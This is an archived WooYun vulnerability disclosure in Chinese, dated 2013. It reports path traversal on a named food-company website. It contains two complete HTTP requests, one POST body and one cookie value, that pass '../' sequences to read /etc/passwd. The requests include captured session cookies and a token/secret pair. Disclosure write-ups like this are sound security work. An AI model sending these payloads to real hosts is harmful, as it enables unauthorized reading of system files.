乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-06: 细节已通知厂商并且等待厂商处理中 2013-11-11: 厂商已经主动忽略漏洞,细节向公众公开
由于对变量过滤不严导致文件路径遍历
POST /index.php?app=home&mod=Index&act=subapp HTTP/1.1Host: haoshiku.cofco.comAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeReferer: http://haoshiku.cofco.com/index.php?app=home&mod=Index&act=subappCookie: haoshiku_think_language=en; SPHPSESSID=cbnd2e2sefa0r0os4l9n4evea5; haoshiku_refer_url=%2Findex.php%3Fapp%3Dareafood%26mod%3DIndex%26act%3Dindex; cbnd2e2sefa0r0os4l9n4evea5_session_to_mc_qq_start_token=%7B%22token%22%3A%229425501434690047830%22%2C%22secret%22%3A%22m4tBPSs6uuHqHexr%22%7DContent-Type: application/x-www-form-urlencodedContent-Length: 8type=../../../../../../../../../../../../../../../../etc/passwd
在type变量输入如上所示的代码,就会导致文件路径遍历
GET /index.php?app=home&act=explanation HTTP/1.1Host: haoshiku.cofco.comAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeReferer: http://haoshiku.cofco.com/Cookie: haoshiku_think_language=en; SPHPSESSID=cbnd2e2sefa0r0os4l9n4evea5; mod=../../../../../../../../../../../../../../../../etc/passwd
这个是在cookie中存在遍历文件目录
两张为burp抓包的截图
过滤变量即可
危害等级:无影响厂商忽略
忽略时间:2013-11-11 14:29
暂无